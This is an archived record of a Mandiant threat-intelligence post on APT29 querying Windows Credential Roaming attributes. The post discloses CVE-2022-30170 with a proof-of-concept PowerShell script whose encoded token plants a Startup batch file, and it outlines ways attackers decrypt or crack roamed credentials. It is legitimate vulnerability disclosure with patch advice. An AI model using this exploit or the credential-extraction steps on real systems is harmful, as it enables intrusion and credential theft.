{
	"id": "4a089da1-cce0-4750-8bd8-d49c249f8dc5",
	"created_at": "2026-04-06T00:21:58.160879Z",
	"updated_at": "2026-04-10T13:12:00.871861Z",
	"deleted_at": null,
	"sha1_hash": "cdc94f30519e692ca4dd99935e3bbcd23112424c",
	"title": "They See Me Roaming: Following APT29 by Taking a Deeper Look at Windows Credential Roaming | Mandiant",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2197890,
	"plain_text": "They See Me Roaming: Following APT29 by Taking a Deeper Look\r\nat Windows Credential Roaming | Mandiant\r\nBy Mandiant\r\nPublished: 2022-11-08 · Archived: 2026-04-05 12:40:18 UTC\r\nWritten by: Thibault Van Geluwe de Berlaere\r\nIn early 2022, Mandiant detected and responded to an incident where APT29 successfully phished a European\r\ndiplomatic entity and ultimately abused the Windows Credential Roaming feature. The diplomatic-centric\r\ntargeting is consistent with Russian strategic priorities as well as historic APT29 targeting. Mandiant has been\r\ntracking APT29—a Russian espionage group that is sponsored by the Foreign Intelligence Service (SVR)—since\r\nat least 2014. Some APT29 activity is also publicly referred to as Nobelium by Microsoft.\r\nDuring the short timespan that APT29 was determined to be active inside the victim network, Mandiant observed\r\nnumerous LDAP queries with atypical properties (Figure 1) performed against the Active Directory system.\r\n4662 | Audit Success | An operation was performed on an object.\r\nSubject :\r\nSecurity ID: \u003c redacted by Mandiant \u003e\r\nAccount Name: \u003c redacted by Mandiant \u003e\r\nAccount Domain:\r\nLogon ID: 0x000000006d15eb96\r\nObject:\r\nObject Server: DS\r\nObject Type: %{bf967aba-0de6-11d0-a285-00aa003049e2}\r\nObject Name: \u003c redacted by Mandiant \u003e\r\nHandle ID: 0x0000000000000000\r\nOperation:\r\nOperation Type: Object Access\r\nAccesses: %%7688\r\nAccess Mask: 0x00000100\r\nProperties: %%7688\r\n{771727b1-31b8-4cdf-ae62-4fe39fadf89e}\r\n{612cb747-c0e8-4f92-9221-fdd5f15b550d}\r\n{91e647de-d96f-4b70-9557-d63ff4f3ccd8}\r\n{b7ff5a38-0818-42b0-8110-d3d154c97f24}\r\n{bf967aba-0de6-11d0-a285-00aa003049e2}\r\nFigure 1: Example of event log of LDAP query\r\nhttps://www.mandiant.com/resources/blog/apt29-windows-credential-roaming\r\nPage 1 of 11\n\nThe queried LDAP attributes relate to usual credential information gathering (e.g. 
unixUserPassword); however,\r\none attribute in particular stood out: {b7ff5a38-0818-42b0-8110-d3d154c97f24} , or msPKI-CredentialRoamingTokens , which is described by Microsoft as ‘storage of encrypted user credential token BLOBs\r\nfor roaming’. Upon further inspection, Mandiant identified that this attribute is part of a lesser-known feature of\r\nActive Directory: Credential Roaming.\r\nA Deep Dive into Credential Roaming\r\nCredential Roaming was introduced in Windows Server 2003 SP1 and is still supported on Windows 11 and\r\nWindows Server 2022. This feature was created to allow certificates (and other credentials) to ‘roam’ with the\r\nuser.\r\nFor example: Consider a scenario where a corporation uses autoenrollment to automatically provision certificates\r\nfor employees for the purpose of Secure/Multipurpose Internet Mail Extension (S/MIME) encryption. When user\r\nAlice logs on to device A, the autoenrollment process launches and she is enrolled into the corresponding\r\ncertificate template. However, should Alice now log in to device B, she would receive a new certificate (because\r\nthe certificate is device-local). Credential Roaming ensures that Alice’s first S/MIME certificate (from device A),\r\nincluding the private key, is saved to device B before the autoenrollment process kicks in. With Credential\r\nRoaming, Alice would only enroll one certificate, thereby removing the need for duplicate certificates and\r\nreducing the certificate management overhead.\r\nFigure 2: Credential Roaming diagram (source)\r\nAny kind of certificates, including certificates from external sources (such as public PKI vendors), are supported\r\n(with the exclusion of certificates where the private key is stored in hardware [e.g. TPM]). More examples and\r\ndetails are available in a Microsoft whitepaper on Credential Roaming, published in 2012.\r\nWindows Vista extended the credential roaming functionality so that usernames and passwords stored in the\r\nWindows Credential Manager can also be roamed between computers. This functionality was removed in\r\nWindows 7, presumably due to security precautions.\r\nCredential Roaming was touched upon briefly by Michael Grafnetter in his blog post Extracting Roamed Private\r\nKeys from Active Directory, where Mr. Grafnetter explains how his DSInternals toolkit can be used to extract\r\nthe roamed credentials from Active Directory and how the popular Mimikatz tool can be used to decrypt the\r\nDPAPI secrets with the DPAPI Domain Backup Key.\r\nCredential Roaming synchronizes certificates and credentials (called ‘Roaming Tokens’) by using the user’s\r\nActive Directory account as a datastore. The 2012 Microsoft whitepaper identifies the following LDAP properties\r\nare used in Credential Roaming:\r\nmsPKI-CredentialRoamingTokens\r\nmsPKIRoamingTimeStamp\r\nmsPKIDPAPIMasterKeys\r\nmsPKIAccountCredentials\r\nThese attributes form the Private-Information property set. The last attribute, msPKIAccountCredentials , is\r\nwhere the Roaming Tokens are stored. The msPKIRoamingTimeStamp attribute contains the last update time of\r\nmsPKIAccountCredentials , and msPKIDPAPIMasterKeys contains the user’s Data Protection API (DPAPI)\r\nMaster Keys.\r\nCredential Roaming is implemented using a Scheduled Task (Figure 3) at\r\n\\Microsoft\\Windows\\CertificateServicesClient\\UserTask-Roam . This scheduled task launches a Component\r\nObject Model (COM) object with CLSID {58FB76B9-AC85-4E55-AC04-427593B1D060} , corresponding with the\r\ndimsjob.dll DLL (the Credential Roaming service was formerly named the Digital Identity Management\r\nService [DIMS]). The string “ KEYROAMING ” is passed as an argument.\r\nFigure 3: Scheduled Task that launches Credential Roaming\r\nBy examining the dimsjob.dll DLL entry point, Mandiant observed that dimsjob.dll loads another DLL,\r\ndimsroam.dll , to perform the Credential Roaming functionality (for the purposes of simplicity, the DLLs\r\nexamined in this article are from Windows Server 2008 R2. Recent versions of Windows use various COM objects\r\nto handle Credential Roaming, but the same principles apply).\r\nFigure 4: Snippet of code from dimsjob.dll!CDims::Notify where dimsroam.dll!DimsRoamEntry is called\r\nMandiant then identified the binary structure of the entries in the msPKIAccountCredentials LDAP attribute\r\n(Figure 5).\r\nFigure 5: Binary structure of Roaming Tokens\r\nThe binary structure starts off with an indication of which type of Roaming Token this entry represents. Mandiant\r\nidentified the following types:\r\n%0: DPAPI Master Key\r\n%1: CAPI Private Key (RSA)\r\n%2: CAPI Private Key (DSA)\r\n%3: CAPI Certificate\r\n%4: CAPI Certificate Request\r\n%5: Username/Password (Enterprise Credential Data)\r\n%6: (unknown – presumably unused)\r\n%7: CNG Certificate\r\n%8: CNG Certificate Request\r\n%9: CNG Private Key\r\nNext follows the identifier of the Roaming Token. This is the filename of the corresponding file on disk. The\r\nstructure continues with the last update timestamp of the Roaming Token, some NULL bytes (padding) and the\r\nSHA1 hash of the Roaming Token data. Finally, the size of the Roaming Token data is included (4 bytes integer)\r\nand the raw data of the Roaming Token data.\r\nWhen dimsroam.dll launches, it retrieves these structures from the msPKIAccountCredentials LDAP attribute\r\nof the current user. For every entry, it determines if there already exists a local file that corresponds to the\r\nRoaming Token. If such a file is found, dimsroam.dll will compare the last file write time and the SHA1 hash\r\nand update the file if necessary. If such a local file is not found, dimsroam.dll identifies the correct save location\r\nfor the binary data based on the type of the Roaming Token (Figure 6).\r\nFigure 6: Snippet from dimsroam.dll where the save location is determined based on the Roaming Token type (the\r\npath is prepended with the user’s\r\nTo determine the final save location of the roaming token, the identifier (byte 0x03 to 0x0F) is appended to the\r\nfolder path string (Figure 7).\r\nFigure 7: Identifier string is appended to folder path string\r\nThis file path is then directly passed to a kernel32!CreateFileW API call (Figure 8), where the Roaming Token\r\ndata will be written.\r\nFigure 8: The modified file path is passed to kernel32!CreateFileW\r\nCVE-2022-30170: Arbitrary File Write turns Remote Code Execution\r\nThe aforementioned behavior introduces an Arbitrary File Write vulnerability: the file path is not properly\r\nsanitized and may contain directory traversal (“..\\”) characters. If an attacker can control the\r\nmsPKIAccountCredentials LDAP attribute, they may add a malicious Roaming Token entry where the identifier\r\nstring contains directory traversal characters and thereby write an arbitrary number of bytes to any file on the file\r\nsystem, posing as the victim account. The only constraint is that the full file name plus directory traversal\r\ncharacters fits within the 92 bytes buffer.\r\nAs a proof of concept, Mandiant developed the following malicious Roaming Token entry (Figure 9).\r\nFigure 9: Malicious Roaming Token entry\r\nTo insert the malicious Roaming Token entry into the msPKIAccountCredentials LDAP attribute of a victim\r\naccount, run the following PowerShell script (Figure 10).\r\n# Fetch current user object\r\n$user = get-aduser -properties @('msPKIDPAPIMasterKeys',\r\n'msPKIAccountCredentials', 'msPKI-CredentialRoamingTokens',\r\n'msPKIRoamingTimestamp')\r\n# Install malicious Roaming Token (spawns calc.exe)\r\n$malicious_hex = \"25335c2e2e5c2e2e5c57696e646f77735c5374617274204d656e755c50726f6772616d735c5374\r\n61727475705c6d616c6963696f75732e6261740000000000000000000000000000000\r\n000000000000000000000000000000000000000000000f0a1f04c9c1ad80100000000f52f696ec0f1d3b13e9d\r\n9d553adbb491ca6cc7a319000000406563686f206f66660d0a73746172742063616c632e657865\"\r\n$attribute_string = \"B:$($malicious_hex.Length):${malicious_hex}:$($user.DistinguishedName)\"\r\nSet-ADUser -Identity $user -Add @{msPKIAccountCredentials=$attribute_string} -Verbose\r\n# Set new msPKIRoamingTimestamp so the victim machine knows an update was pushed\r\n$new_msPKIRoamingTimestamp = ($user.msPKIRoamingTimestamp[8..15] + [System.BitConverter]::GetBytes([datetime]::U\r\nset-aduser -Identity $user -Replace @{msPKIRoamingTimestamp=$new_msPKIRoamingTimestamp} -Verbose\r\nFigure 10: PowerShell script to insert the malicious Roaming Token entry\r\nBy updating the msPKIRoamingTimeStamp attribute, the Credential Roaming service will trigger synchronization\r\non any computer where the victim user logs in from then on; dimsroam.dll will parse the\r\nmsPKIAccountCredentials LDAP attribute and will create\r\n‘ %APPDATA%\\Microsoft\\SystemCertificates\\My\\Certificates\\..\\..\\..\\Windows\\Start\r\nMenu\\Programs\\Startup\\malicious.bat ‘ (or simplified, ‘ %APPDATA%\\Microsoft\\Windows\\Start\r\nMenu\\Programs\\Startup\\malicious.bat ‘) with the content ‘ @echo off [newline] start calc.exe’ . This BAT\r\nfile will execute the next time the user logs on to any system, thereby achieving remote code execution in the\r\ncontext of the victim user.\r\nThis vulnerability was reported to MSRC in April 2022 and was classified as an ‘Elevation of Privilege’\r\nvulnerability. Microsoft assigned CVE-2022-30170 and published KB5017365 and KB5017367 on September 13\r\n2022 to address the issue. Mandiant published this vulnerability under MNDT-2022-0038.\r\nAn Attacker's Perspective\r\nThe use of Credential Roaming in an organization allows attackers (and Red Teams) to abuse the saved credentials\r\nfor the purposes of privilege escalation. The author identifies the following situations that could allow an attacker\r\nto abuse Credential Roaming:\r\n1. An organization has not applied the September 2022 patch to each system where Credential Roaming is\r\nused.\r\nThe affected systems are vulnerable to CVE-2022-30170 – an attacker can abuse this vulnerability to write\r\narbitrary files to the affected systems in the context of any users they can control, possibly allowing for\r\nlateral movement. Using this technique, an attacker can spread to any affected system accessed by the\r\nvictim user, including systems that are possibly unknown to the attacker at the time of compromise, in a\r\nfully automatic fashion.\r\nNote that the attacker requires write access to the victim user’s Active Directory account, either by having\r\naccess to the account itself or through another AD account with sufficient privileges over the victim\r\naccount. Credential Roaming must be configured and in use on the victim user and system for the\r\nvulnerability to be exploitable.\r\n2. An attacker gained Domain Administrator privileges in an organization where Credential Roaming is in use\r\nor was used in the past without proper clean-up.\r\nIn this scenario, the attacker can retrieve the DPAPI Domain Backup Key and decrypt all credentials stored\r\nin the Active Directory attributes for Credential Roaming. In his blog post ‘Extracting Roamed Private\r\nKeys from Active Directory’, Mr. Grafnetter explains how his DSInternals toolkit can be used to extract\r\nthe roamed credentials from Active Directory and how Mimikatz tool can be used to decrypt the DPAPI\r\nsecrets with the DPAPI Domain Backup Key.\r\nNote that even if your organization does not currently use Credential Roaming, but used Credential\r\nRoaming in the past, credentials may still be stored in the Active Directory! In their 2012 whitepaper,\r\nMicrosoft explains how system administrators should decommission Certificate Roaming. The\r\ndecommissioning process includes manual deletion of the Roaming Credentials from Active Directory\r\n(clearing the msPKIAccountCredentials , msPKIRoamingTimeStamp and msPKIDPAPIMasterKeys LDAP\r\nattributes). Organizations that failed to perform this clean-up process may still have sensitive secrets stored\r\nin their Active Directory environment.\r\nAdditionally, if the organization uses (or used) Credential Roaming with Windows Vista-era machines, not\r\nonly certificates/private keys but also usernames and passwords may be stored in the Active Directory\r\n(Windows 7 removed the ability to roam usernames and passwords, presumably due to security concerns).\r\n3. An attacker has access to the cleartext password of a user where Credential Roaming is in use or was in use\r\nin the past.\r\nAs in scenario (2), the attacker can authenticate as the victim user and retrieve the Credential Roaming\r\nattributes from Active Directory. With the user’s cleartext password, the attacker can decrypt the DPAPI\r\nmaster key and in turn obtain the credentials stored in the Credential Roaming attributes.\r\n4. An attacker has read access to the msPKIDPAPIMasterKeys attribute on a victim account, but does not have\r\nthe cleartext password of the victim user.\r\nBy reading the msPKIDPAPIMasterKeys attribute, an attacker can extract the DPAPI Master Key for a user\r\nand use the DPAPImk2john.py Python script from the popular John the Ripper password cracking software\r\nto extract the user’s password hash. This hash can then be cracked offline using either John The Ripper\r\n(john) or hashcat.\r\nRecommendations\r\nMandiant recommends organizations to check whether Credential Roaming is in use in their environment; and if\r\nso, apply the September 2022 patch urgently to remediate CVE-2022-30170. Additionally, organizations that have\r\nused Credential Roaming in the past should investigate if the proper clean-up process (as described by Microsoft)\r\nwas followed.\r\nFuture Work\r\nWhile this research certainly deepens our understanding of Credential Roaming and offers insight into why\r\nAPT29 is actively querying the related LDAP attributes in Active Directory, the attribute that Mandiant IR\r\nconsultants observed ( msPKI-CredentialRoamingTokens {b7ff5a38-0818-42b0-8110-d3d154c97f24} ) is not\r\nfeatured in the inner workings of Credential Roaming. Mandiant was—as of yet—unable to determine how (or if)\r\nthis attribute is used in Credential Roaming.\r\nReferences\r\n1. Certs On Wheels: Understanding Credential Roaming – Microsoft\r\n2. Extracting Roamed Private Keys from Active Directory – Michael Grafnetter\r\n3. Windows: Credential Roaming (Whitepaper) – Microsoft\r\n4. CVE-2022-30170: Windows Credential Roaming Service Elevation of Privilege Vulnerability – Microsoft\r\n5. MNDT-2022-0038: Windows Credential Roaming Service Elevation of Privilege Vulnerability\r\nAppendix: Disclosure Timeline for CVE-2022-30170\r\n20 April 2022 - Issue submitted to Microsoft\r\n26 April 2022 - Case opened\r\n18 May 2022 - Microsoft confirms issue\r\n01 June 2022 - Microsoft classifies issue as a 'Defense in Depth' vulnerability\r\n07 June 2022 - Re-explain scope and impact to MSRC\r\n09 June 2022 - MSRC re-evaluates severity of the issue\r\n17 June 2022 - MSRC assigns CVE-2022-30170\r\n13 September 2022 - Patch released\r\nPosted in\r\nThreat Intelligence\r\nSecurity \u0026 Identity\r\nSource: https://www.mandiant.com/resources/blog/apt29-windows-credential-roaming",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE",
		"ETDA"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.mandiant.com/resources/blog/apt29-windows-credential-roaming"
	],
	"report_names": [
		"apt29-windows-credential-roaming"
	],
	"threat_actors": [
		{
			"id": "b43e5ea9-d8c8-4efa-b5bf-f1efb37174ba",
			"created_at": "2022-10-25T16:07:24.36191Z",
			"updated_at": "2026-04-10T02:00:04.954902Z",
			"deleted_at": null,
			"main_name": "UNC2452",
			"aliases": [
				"Dark Halo",
				"Nobelium",
				"SolarStorm",
				"StellarParticle",
				"UNC2452"
			],
			"source_name": "ETDA:UNC2452",
			"tools": [],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "1d3f9dec-b033-48a5-8b1e-f67a29429e89",
			"created_at": "2022-10-25T15:50:23.739197Z",
			"updated_at": "2026-04-10T02:00:05.275809Z",
			"deleted_at": null,
			"main_name": "UNC2452",
			"aliases": [
				"UNC2452",
				"NOBELIUM",
				"StellarParticle",
				"Dark Halo"
			],
			"source_name": "MITRE:UNC2452",
			"tools": [
				"Sibot",
				"Mimikatz",
				"Cobalt Strike",
				"AdFind",
				"GoldMax"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "5b748f86-ac32-4715-be9f-6cf25ae48a4e",
			"created_at": "2024-06-04T02:03:07.956135Z",
			"updated_at": "2026-04-10T02:00:03.689959Z",
			"deleted_at": null,
			"main_name": "IRON HEMLOCK",
			"aliases": [
				"APT29 ",
				"ATK7 ",
				"Blue Kitsune ",
				"Cozy Bear ",
				"The Dukes",
				"UNC2452 ",
				"YTTRIUM "
			],
			"source_name": "Secureworks:IRON HEMLOCK",
			"tools": [
				"CosmicDuke",
				"CozyCar",
				"CozyDuke",
				"DiefenDuke",
				"FatDuke",
				"HAMMERTOSS",
				"LiteDuke",
				"MiniDuke",
				"OnionDuke",
				"PolyglotDuke",
				"RegDuke",
				"RegDuke Loader",
				"SeaDuke",
				"Sliver"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "a241a1ca-2bc9-450b-a07b-aae747ee2710",
			"created_at": "2024-06-19T02:03:08.150052Z",
			"updated_at": "2026-04-10T02:00:03.737173Z",
			"deleted_at": null,
			"main_name": "IRON RITUAL",
			"aliases": [
				"APT29",
				"Blue Dev 5 ",
				"BlueBravo ",
				"Cloaked Ursa ",
				"CozyLarch ",
				"Dark Halo ",
				"Midnight Blizzard ",
				"NOBELIUM ",
				"StellarParticle ",
				"UNC2452 "
			],
			"source_name": "Secureworks:IRON RITUAL",
			"tools": [
				"Brute Ratel C4",
				"Cobalt Strike",
				"EnvyScout",
				"GoldFinder",
				"GoldMax",
				"NativeZone",
				"RAINDROP",
				"SUNBURST",
				"Sibot",
				"TEARDROP",
				"VaporRage"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "46b3c0fc-fa0c-4d63-a38a-b33a524561fb",
			"created_at": "2023-01-06T13:46:38.393409Z",
			"updated_at": "2026-04-10T02:00:02.955738Z",
			"deleted_at": null,
			"main_name": "APT29",
			"aliases": [
				"Cloaked Ursa",
				"TA421",
				"Blue Kitsune",
				"BlueBravo",
				"IRON HEMLOCK",
				"G0016",
				"Nobelium",
				"Group 100",
				"YTTRIUM",
				"Grizzly Steppe",
				"ATK7",
				"ITG11",
				"COZY BEAR",
				"The Dukes",
				"Minidionis",
				"UAC-0029",
				"SeaDuke"
			],
			"source_name": "MISPGALAXY:APT29",
			"tools": [
				"SNOWYAMBER",
				"HALFRIG",
				"QUARTERRIG"
			],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "70872c3a-e788-4b55-a7d6-b2df52001ad0",
			"created_at": "2023-01-06T13:46:39.18401Z",
			"updated_at": "2026-04-10T02:00:03.239111Z",
			"deleted_at": null,
			"main_name": "UNC2452",
			"aliases": [
				"DarkHalo",
				"StellarParticle",
				"NOBELIUM",
				"Solar Phoenix",
				"Midnight Blizzard"
			],
			"source_name": "MISPGALAXY:UNC2452",
			"tools": [
				"SNOWYAMBER",
				"HALFRIG",
				"QUARTERRIG"
			],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "20d3a08a-3b97-4b2f-90b8-92a89089a57a",
			"created_at": "2022-10-25T15:50:23.548494Z",
			"updated_at": "2026-04-10T02:00:05.292748Z",
			"deleted_at": null,
			"main_name": "APT29",
			"aliases": [
				"APT29",
				"IRON RITUAL",
				"IRON HEMLOCK",
				"NobleBaron",
				"Dark Halo",
				"NOBELIUM",
				"UNC2452",
				"YTTRIUM",
				"The Dukes",
				"Cozy Bear",
				"CozyDuke",
				"SolarStorm",
				"Blue Kitsune",
				"UNC3524",
				"Midnight Blizzard"
			],
			"source_name": "MITRE:APT29",
			"tools": [
				"PinchDuke",
				"ROADTools",
				"WellMail",
				"CozyCar",
				"Mimikatz",
				"Tasklist",
				"OnionDuke",
				"FatDuke",
				"POSHSPY",
				"EnvyScout",
				"SoreFang",
				"GeminiDuke",
				"reGeorg",
				"GoldMax",
				"FoggyWeb",
				"SDelete",
				"PolyglotDuke",
				"AADInternals",
				"MiniDuke",
				"SeaDuke",
				"Sibot",
				"RegDuke",
				"CloudDuke",
				"GoldFinder",
				"AdFind",
				"PsExec",
				"NativeZone",
				"Systeminfo",
				"ipconfig",
				"Impacket",
				"Cobalt Strike",
				"PowerDuke",
				"QUIETEXIT",
				"HAMMERTOSS",
				"BoomBox",
				"CosmicDuke",
				"WellMess",
				"VaporRage",
				"LiteDuke"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "f27790ff-4ee0-40a5-9c84-2b523a9d3270",
			"created_at": "2022-10-25T16:07:23.341684Z",
			"updated_at": "2026-04-10T02:00:04.549917Z",
			"deleted_at": null,
			"main_name": "APT 29",
			"aliases": [
				"APT 29",
				"ATK 7",
				"Blue Dev 5",
				"BlueBravo",
				"Cloaked Ursa",
				"CloudLook",
				"Cozy Bear",
				"Dark Halo",
				"Earth Koshchei",
				"G0016",
				"Grizzly Steppe",
				"Group 100",
				"ITG11",
				"Iron Hemlock",
				"Iron Ritual",
				"Midnight Blizzard",
				"Minidionis",
				"Nobelium",
				"NobleBaron",
				"Operation Ghost",
				"Operation Office monkeys",
				"Operation StellarParticle",
				"SilverFish",
				"Solar Phoenix",
				"SolarStorm",
				"StellarParticle",
				"TEMP.Monkeys",
				"The Dukes",
				"UNC2452",
				"UNC3524",
				"Yttrium"
			],
			"source_name": "ETDA:APT 29",
			"tools": [
				"7-Zip",
				"ATI-Agent",
				"AdFind",
				"Agentemis",
				"AtNow",
				"BEATDROP",
				"BotgenStudios",
				"CEELOADER",
				"Cloud Duke",
				"CloudDuke",
				"CloudLook",
				"Cobalt Strike",
				"CobaltStrike",
				"CosmicDuke",
				"Cozer",
				"CozyBear",
				"CozyCar",
				"CozyDuke",
				"Danfuan",
				"EnvyScout",
				"EuroAPT",
				"FatDuke",
				"FoggyWeb",
				"GeminiDuke",
				"Geppei",
				"GoldFinder",
				"GoldMax",
				"GraphDrop",
				"GraphicalNeutrino",
				"GraphicalProton",
				"HAMMERTOSS",
				"HammerDuke",
				"LOLBAS",
				"LOLBins",
				"LiteDuke",
				"Living off the Land",
				"MagicWeb",
				"Mimikatz",
				"MiniDionis",
				"MiniDuke",
				"NemesisGemina",
				"NetDuke",
				"OnionDuke",
				"POSHSPY",
				"PinchDuke",
				"PolyglotDuke",
				"PowerDuke",
				"QUIETEXIT",
				"ROOTSAW",
				"RegDuke",
				"Rubeus",
				"SNOWYAMBER",
				"SPICYBEAT",
				"SUNSHUTTLE",
				"SeaDaddy",
				"SeaDask",
				"SeaDesk",
				"SeaDuke",
				"Sharp-SMBExec",
				"SharpView",
				"Sibot",
				"Solorigate",
				"SoreFang",
				"TinyBaron",
				"WINELOADER",
				"WellMail",
				"WellMess",
				"cobeacon",
				"elf.wellmess",
				"reGeorg",
				"tDiscoverer"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434918,
	"ts_updated_at": 1775826720,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/cdc94f30519e692ca4dd99935e3bbcd23112424c.pdf",
		"text": "https://archive.orkl.eu/cdc94f30519e692ca4dd99935e3bbcd23112424c.txt",
		"img": "https://archive.orkl.eu/cdc94f30519e692ca4dd99935e3bbcd23112424c.jpg"
	}
}